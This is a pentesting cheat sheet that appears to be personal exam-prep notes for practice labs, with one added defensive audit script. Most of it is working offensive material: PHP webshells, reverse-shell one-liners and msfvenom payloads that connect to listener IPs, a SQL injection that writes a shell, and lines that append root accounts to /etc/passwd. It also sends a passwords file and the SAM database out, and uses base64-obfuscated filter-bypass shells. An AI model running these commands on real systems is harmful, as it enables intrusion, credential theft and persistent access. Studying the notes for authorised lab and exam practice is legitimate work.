- Early on, when stuck, read the writeup, take one step from it, then continue on your own.
- After finishing a box, re-read a few writeups to see whether there are other approaches.
- For some exploits, try toggling the trailing / on the URL.
- For some ports, try connecting with both telnet and nc.
- During the exam, search for writeups with the keywords hack the box / tryhackme / ProvingGrounds.
- Run strings on binaries first.
- List directories with ls -al -R (on Windows dir /a or tree /f); don't miss hidden files.
- For an unknown port, connect and try typing help.
- After getting into a WordPress site, remember to read the database password in /var/www/html/wp-config.php.
Some payload pages:
Hack The Planet
Readme - PENETRATION NOTE
swisskyrepo/PayloadsAllTheThings
Some essential sites:
HackTricks - HackTricks
Exploit Database
GTFOBins
Online - Reverse Shell Generator
Recon
nmap
nmap --script vuln 192.168.146.60
nmap -sT -p- --min-rate 10000 10.129.138.220
UDP scan
nmap -vvv -sU -o nmapudp 10.129.138.220 --max-retries 0
or
nmap -sU --top-ports 10 -sV 10.129.228.106
Specific UDP ports
nmap -p 161,500 -sV -sU -sC 10.129.138.220
21 FTP
# recursive download
wget -m --no-passive ftp://anonymous:anonymous@192.168.186.145
wget -r -c -nH -np ftp://10.1.1.68/ --ftp-user=steph --ftp-password=billabong
# view a file directly from the ftp prompt
ftp> more xxxx
80 directory scanning
gobuster dir -u http://192.168.146.71:7331/ -w /usr/share/wordlists/dirb/big.txt -t 500
gobuster dir -u http://192.168.146.54 -w /home/fazx/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
dirsearch -u http://192.168.234.143/ -r -R 2 -x 404 -w /usr/share/wordlists/dirb/big.txt
# new dict
/cgi-bin/admin.cgi
/api/heartbeat.php
80 FUZZ, API
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 12 http://192.168.146.54/index.php?FUZZ=../location.txt
# pattern file ({GOBUSTER} is replaced by each wordlist entry)
{GOBUSTER}/v1
{GOBUSTER}/v2
gobuster dir -u http://192.168.250.143 -w /usr/share/wordlists/dirb/big.txt -p pattern
80 wpscan
wpscan --url http://literally.vulnerable:65535/phpcms/ -t 20 --enumerate vt,vp,u (--passwords passwords)
80 hosts / cms
cmseek -u http://192.168.186.145/
whatweb http://192.168.50.244
echo "192.168.146.65 literally.vulnerable" >> /etc/hosts
Some resources won't load until you check F12 (dev tools) and add the hostname to /etc/hosts.
135 RPC
rpcclient -U "" -N 192.168.186.145
for i in $(seq 500 1100); do
rpcclient -N -U "" 192.168.186.145 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";
done
161 SNMP udp
snmp-check "192.168.233.145" -c public
snmpwalk -c public -v1 192.168.210.149
snmpbulkwalk -c public -v2c 10.10.11.136 .
https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp
445 smb
crackmapexec smb 192.168.186.145
crackmapexec smb 192.168.50.242 -u john -p "dqsTwTpZPn#nL" --shares
crackmapexec smb ip -u 'anonymous' -p 'anonymous' --users
smbclient -N -L //192.168.186.145
smbclient -L //172.16.210.83/ -U medtech.com/wario --pw-nt-hash
smbclient \\\\10.10.10.131\\ADMIN$ -U Administrator
impacket-psexec -hashes 00000000000000000000000000000000:e728ecbadfb02f51ce8eed753f3ff3fd celia.almeda@10.10.140.142
1433 MSSQL
crackmapexec mssql ip -u sa -p pass --local-auth -x 'whoami'
impacket-mssqlclient sql_svc:Dolphin1@10.10.100.148 -windows-auth
sqsh -U sa -P poiuytrewq -S 10.11.1.31:1433
a'+or+'a'='a'+;exec+master..xp_cmdshell+'ping+192.168.119.169'--
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
exec master..xp_cmdshell 'whoami'
3389 RDP
Connect
xfreerdp /u:test /p:123 /v:10.10.100.148 /cert:ignore -wallpaper /drive:kali,/root/Desktop/exp/temp
# config file (one argument per line)
/u:mac
/p:IAmTheGOATSysAdmin!
/v:192.168.126.221
/cert:ignore
/drive:kali,/root/Desktop/exp
Enable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
net stop termservice && net start termservice
LFI
Idea: read /etc/passwd for usernames, then read the private key from the user's home directory, /home/user/.ssh/id_rsa.
If the parameter name is something like view, file, page, skin, theme, lang or template, file inclusion is highly likely.
?page=php://filter/convert.base64-encode/resource=view.php
windows LFI files
https://notchxor.github.io/oscp-notes/4-win-privesc/15-LFI-FILES/
Brute force
Wordlists
/usr/share/dirb/wordlists/common.txt
/usr/share/wfuzz/wordlist/others/common_pass.txt
/usr/share/wordlists/rockyou.txt
/usr/share/wordlists/dirb/big.txt
/usr/share/wfuzz/wordlist/general/big.txt
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Hydra
hydra -l pinky -P /usr/share/dirb/wordlists/common.txt 192.168.146.54 -s 7654 http-post-form '/login.php:user=^USER^&pass=^PASS^:F=Invalid'
hydra -l admin -P /home/fazx/SecLists/Passwords/2020-200_most_used_passwords.txt "ignition.htb" http-post-form "/admin:form_key=WaEWxk61HqTZyMVP&login%5Busername%5D=admin&login%5Bpassword%5D=^PASS^:please sign in" -V
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.146.55 ssh
hydra -L /usr/share/wordlists/chaoji/dic_username_ftp.txt -P /usr/share/wordlists/chaoji/dic_password_ftp.txt 192.168.146.80 ftp
hydra 192.168.146.60 -P /usr/share/wordlists/rockyou.txt http-post-form '/kzMb5nVYJw/index.php:key=^PASS^:invalid' -la   (-la is equivalent to passing an arbitrary username "a")
hydra -l postgres -P /usr/share/wordlists/rockyou.txt 192.168.234.143 postgres
wpscan
wpscan --url http://127.0.0.1:1337/wordpress/ --wp-content-dir wp-content/ --proxy http://192.168.247.148:8080 --no-banner -U jerome -P /usr/share/wordlists/rockyou.txt
wpscan --url http://192.168.50.244 --enumerate ap --plugins-detection aggressive
Aggressive mode finds more plugins; for --enumerate, p is popular, vp is vulnerable, ap is all.
samba
Enumerate users:
enum4linux -U 192.168.3.142
Brute-force passwords
./acccheck.pl -t 192.168.3.142 -u smb -v
Log in and look around
smbclient //192.168.3.142/smb -U smb
zip
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt sitebackup3.zip -v
zip2john sitebackup3.zip > zip.hash
john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt
Getting a shell
webshell
<?php system($_GET['cmd']); ?>
<?php echo passthru($_GET['cmd']);
Writing a shell via UNION injection
1' UNION SELECT 1,2,3,("<?php echo passthru($_GET['cmd']);") INTO OUTFILE '/var/www/html/tmp/123.php'#
Reverse shell
https://www.revshells.com/
Running PowerShell commands through cme is fairly reliable.
# busybox as a fallback when nc -e / nc -c is unavailable
busybox nc 192.168.146.55 8888 -e sh
# PHP one-liner reverse shell
<?php $sock = fsockopen("192.168.146.55",8888); $proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>
# windows reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.68 LPORT=3306 -f exe > evil.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.164 LPORT=21 -f exe > 21.exe
php -r '$sock=fsockopen("192.168.146.58",8888);exec("/bin/sh -i <&3 >&3 2>&3");'
echo "echo cGhwIC1yICckc29jaz1mc29ja29wZW4oIjE5Mi4xNjguMTQ2LjU4Iiw4ODg4KTtwb3BlbigiL2Jpbi9iYXNoIDwmMyA+JjMgMj4mMyIsICJyIik7Jw== | base64 -d" >> ../write.sh
echo "php -r '\$sock=fsockopen(\"192.168.146.58\",8888);exec(\"/bin/sh -i <&3 >&3 2>&3\");'" >> write.sh
?plot=;curl http://192.168.86.99/rshell443.txt --output rshell443.php
nc 192.168.146.55 9999 | /bin/bash | nc 192.168.146.55 8888
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.45.234 LPORT=443 -f exe > 443.exe
socat fully interactive shell
kali: socat file:`tty`,raw,echo=0 tcp-listen:8888
target: ./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.146.55:8888
python semi-interactive shell
// semi-interactive shell, run on the target
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
Upgrading to a fully interactive shell with stty
// fully interactive
// on Kali, the zsh terminal that comes with GNOME has problems here: Enter turns into ^M and the shell is unusable
// so first type bash to get back to a plain terminal
# In Kali
$ bash
# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
# In Kali
$ stty raw -echo
$ fg
# In reverse shell
$ reset
If asked "Terminal type?", you can enter xterm-256color, but vi may then fail to display text,
so it is usually safer to use xterm or dumb (check with echo $TERM).
Windows privilege escalation
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#ssh-keys-in-registry
https://benheater.com/thm-windows-privesc/
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
https://zhuanlan.zhihu.com/p/428516577
Check privileges first
whoami /all
SeImpersonatePrivilege
PrintSpoofer64.exe -i -c cmd.exe
.\PrintSpoofer64.exe -i -c cmd.exe
PrintSpoofer64.exe -i -c "powershell.exe -e JABjAGwAa..."
certutil.exe -urlcache -split -f "http://192.168.45.234/PrintSpoofer64.exe"
Check services
certutil.exe -urlcache -split -f "http://192.168.45.164/PowerUp.ps1"
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
powershell -exec bypass -Command "Import-Module .\PowerUp.ps1;Invoke-AllChecks"
schtasks /query /fo LIST /v
icacls "%ProgramFiles%\RUXIM\PLUGscheduler.exe"
accesschk.exe /accepteula -uwcqv "user"
Service unquoted path
powershell -ep bypass
. .\PowerUp.ps1
Get-UnquotedService
Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe"   (this directly adds a local admin user john/Password123!, which is convenient)
Restart-Service GammaService
Check for vulnerabilities
Winpeas
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile "IEX(New-Object System.Net.WebClient).downloadFile('http://192.168.49.133/winPEASany.exe','c:\Users\rupert\Desktop\wp.exe')"
AlwaysInstallElevated MSI Abuse
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
When both values are 1, an MSI run by a normal user executes with SYSTEM privileges.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.79 LPORT=443 -f msi > ~/Desktop/exp/shell443.msi
Just run the MSI directly; below is the silent install command.
msiexec /quiet /qn /i C:\Temp\setup.msi
Manually look for other information
SauronEye.exe -d C:\Users\ --filetypes .txt .xml .conf .log --contents --keywords password
type C:\Users\wario\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"
# SNMP Parameters
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
# find the PowerShell command history file
dir /s /b "ConsoleHost_history.txt"
# ssh (keys cached by the OpenSSH agent)
reg query HKCU\Software\OpenSSH\Agent\Keys
Linux privilege escalation
LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
wget http://192.168.146.55/linpeas.sh
Pspy
# continuously monitors processes; complements linpeas
wget https://hub.nuaa.cf/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
Cron jobs
grep "CRON" /var/log/cron.log
cat /etc/crontab
/etc/passwd
openssl passwd evil
echo "root2:EyCPXNrY/E2XE:0:0:root:/root:/bin/bash" >> /etc/passwd
echo "root4::0:0::/root:/bin/bash" >> /etc/passwd
Such accounts cannot log in via ssh; you can only su to them from an existing shell.
SUID
#Find all SUID binaries
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
(-perm 4000 corresponds to -rws)
# (may require the current user's password; this is defined in /etc/sudoers)
sudo -ll #Check commands you can execute with sudo
//list user's privileges or check a specific command; use twice for longer format
https://tttang.com/archive/1793/
Special files
There may be cron jobs you cannot see; you have to guess which file they run and modify it.
# find files owned by a given user
find / -user demon 2>/dev/null | grep -Ev '/proc|/sys|/user'
find / -user www-data -ls 2>/dev/null | (grep -v proc)
# find writable files
find / -writable 2>/dev/null | grep -v proc
# remember: find -name matches the whole name exactly, so use wildcards (quoted, so the shell does not expand them first)
find / -name '*penguin*' 2>/dev/null
searchsploit
grep PRETTY /etc/os-release
searchsploit linux kernel ubuntu 16.04
cp /usr/share/exploitdb/exploits/linux/local/45010.c ./
gcc 45010.c -o 45010
PATH hijacking privilege escalation
cd /tmp
echo "/bin/sh" > ls
chmod +x ls
echo $PATH
export PATH=/tmp:$PATH
cd /home/raj/script
./shell
whoami
Pwnkit
https://github.com/arthepsy/CVE-2021-4034
user@debian:~$ grep PRETTY /etc/os-release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
user@debian:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
user@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
user@debian:~$ ./cve-2021-4034-poc
It's all about the version.
According to https://github.com/cyberark/PwnKit-Hunter/blob/main/CVE-2021-4034_Finder.py versions below these are vulnerable:
Ubuntu 20.04: 0.105-26ubuntu1.2
Ubuntu 21.10: 0.105-31ubuntu0.1
Ubuntu 18.04: 0.105-20ubuntu0.18.04.6
Debian stretch: 0.105-18+deb9u2
Debian buster: 0.105-25+deb10u1
Debian bullseye: 0.105-31+deb11u1
lxd privilege escalation
You must first be in the lxd group, and lxc must be installed.
https://reboare.github.io/lxd/lxd-escape.html
https://windsorwebdeveloper.com/web-developer-1-vulnhub-walkthrough/
ubuntu@ubuntu:~$ lxd init   (accept every default, just keep pressing Enter)
ubuntu@ubuntu:~$ lxc init ubuntu:16.04 test -c security.privileged=true
Creating test
ubuntu@ubuntu:~$ lxc config device add test whatever disk source=/ path=/mnt/root recursive=true
Device whatever added to test
ubuntu@ubuntu:~$ lxc start test
ubuntu@ubuntu:~$ lxc exec test bash
NFS privilege escalation
The exported directory in /etc/exports must be configured with no_root_squash.
(in Kali)
# showmount -e 192.168.146.60
Export list for 192.168.146.60:
/home/user5 *
# mkdir nfstmp
# mount -t nfs 192.168.146.60:/home/user5 nfstmp
# cd nfstmp
# cp /bin/sh ./nfsh
# chmod +s nfsh
(in target)
# ./nfsh -p
After mounting the share, drop an SUID file there and escalate. In practice, whether you copy bash, compile a C program or write Python, the result runs with euid != uid, in which case it actually executes with the uid's privileges and the escalation fails; that is why sh needs -p, so it does not reset the euid.
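As an added defender-side example (not part of these notes), the checks below detect the two host conditions abused in the /etc/passwd and NFS sections above: extra uid-0 or passwordless accounts, and exports that set no_root_squash. The passwd and exports contents are constructed samples.

```shell
#!/bin/sh
# Added audit example, not part of the original notes. Detects the two
# conditions abused above: rogue uid-0 / passwordless accounts appended to
# /etc/passwd, and NFS exports that carry no_root_squash.

# Constructed sample /etc/passwd (includes the root2/root4 lines from the notes).
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
user:x:1000:1000:user:/home/user:/bin/bash
root2:EyCPXNrY/E2XE:0:0:root:/root:/bin/bash
root4::0:0::/root:/bin/bash'

# Constructed sample /etc/exports.
SAMPLE_EXPORTS='# exports
/home/user5 *(rw,sync,no_root_squash)
/srv/share 10.0.0.0/24(ro,sync,root_squash)'

# Print account names that have uid 0 but are not "root", or whose password
# field is empty (passwordless su). Reads passwd-format lines from stdin.
find_rogue_root_accounts() {
    awk -F: '($3 == 0 && $1 != "root") || $2 == "" { print $1 }'
}

# Print the paths of exports carrying no_root_squash, skipping comment lines.
# With no_root_squash, a client's root keeps uid 0 on the server, which is
# what lets an SUID binary dropped over NFS escalate. Reads exports from stdin.
find_no_root_squash_exports() {
    grep -v '^[[:space:]]*#' | grep 'no_root_squash' | awk '{ print $1 }'
}

# Run both checks against the samples; on a real host feed in
# /etc/passwd and /etc/exports instead.
audit() {
    echo "uid-0 or passwordless accounts:"
    printf '%s\n' "$SAMPLE_PASSWD" | find_rogue_root_accounts
    echo "exports with no_root_squash:"
    printf '%s\n' "$SAMPLE_EXPORTS" | find_no_root_squash_exports
}

audit
```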
Lateral movement inside the domain
Setting up a tunnel (ligolo-ng)
On Kali:
sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up
kali:
./proxy -selfcert
target:
agentw64.exe -connect 192.168.119.166:11601 -ignore-cert
kali:
>session
>ifconfig
Open another terminal:
ip route add 10.10.56.0/24 dev ligolo   # 10.10.56.0/24 is the subnet you want to reach
>start
Port forwarding:
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
Forwards the target's port 1234 to Kali's port 4321.
listener_add --addr 127.0.0.1:80 --to 0.0.0.0:80 --tcp
Forwards Kali's port 80 to the target's port 80.
Note that 0.0.0.0 refers to the agent's (target's) address,
and 127.0.0.1 refers to Kali's address; no need to substitute an IP, use them as written.
Files
Writing files
$ cat > test.c
#include <sys/stat.h>
#include <unistd.h>
/* constructor runs automatically when this object is loaded */
void __attribute__((constructor)) init (void)
{
chown("/tmp/test", 0, 0);
chmod("/tmp/test", 04755);
}
^D
cat > 2.txt <<EOF
this is test
this is test
this is test
EOF
Writing a public key
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCdubHNkqPbAwD0ikkAKCWcEmxDNokB4gYle0ioj/NC/PA6wQjHRFOA32H/xGS1aGuTv3+xe9d7F4m6QuhZytNJ6QeVchqnf6zqg+0XlRyNxA3SUVxl2j+8fMgHeA92QqfWoIcknH/CaEWo5ZQTrSL4+A0hX2c7xMy2RyU4LEYxY3pEy9LayHmaqjHd3CKaeiDDDyEhSuGNPn1xPAOLB4h4idk88Ih50tu6rbl0hk/rEUCFYTTsWNtVy1u+uGAqimHv0xsYKQux1JLkymKYERXwTxSmNjK0Bx/d5IrI4oh4iUfnxqsvwcG6Sb6sKFwlhYypNgRr6zU3eZMltsSlc10j root@kali" > .ssh/authorized_keys
File transfer
nc.exe 192.168.45.201 80 < "C:\Users\offsec\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData\3.0.0.0\passwords.txt"
nc -lp 80 > pass.txt
scp C:\windows.old\windows\system32\SAM root@10.10.100.147:/root/Desktop/
kali> impacket-smbserver myshare ./ -smb2
net use M: \\10.10.100.147:4455\myshare
cp a.exe M:
File download
certutil.exe -urlcache -split -f "http://192.168.45.234/PrintSpoofer64.exe"
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile "IEX(New-Object System.Net.WebClient).downloadFile('http://192.168.49.133/winPEASany.exe','c:\Users\rupert\Desktop\wp.exe')"
Searching file contents
$ grep -R ".trash_old" /var/ 2>/dev/null
/var/spool/cron/crontabs/root:* * * * * /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
find / -type f 2>/dev/null | xargs grep -l tmp.py 2>/dev/null
Other
Python virtualenv
virtualenv .
source ./bin/activate
deactivate
searchsploit
searchsploit -u        # update the database
searchsploit -m 50505  # mirror (copy) the exploit to the current directory
searchsploit -x 50505  # examine the exploit contents
Bypasses
/bin/ech? bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjU2LjEwMyA2NjY2ICAK|/u?r/b?n/b?se64 -d|/bin/?h
echo+YnVzeWJveCBuYyAxOTIuMTY4LjE0Ni41NSA4ODg4IC1lIC9iaW4vYmFzaA==+|+base64+-d|sh
ssh ... -t 'bash --noprofile'   # bypass rbash
base64
// encode the command
echo "ls -l" | base64
// decode the command and execute it
echo bHMgLWwK | base64 -d | sh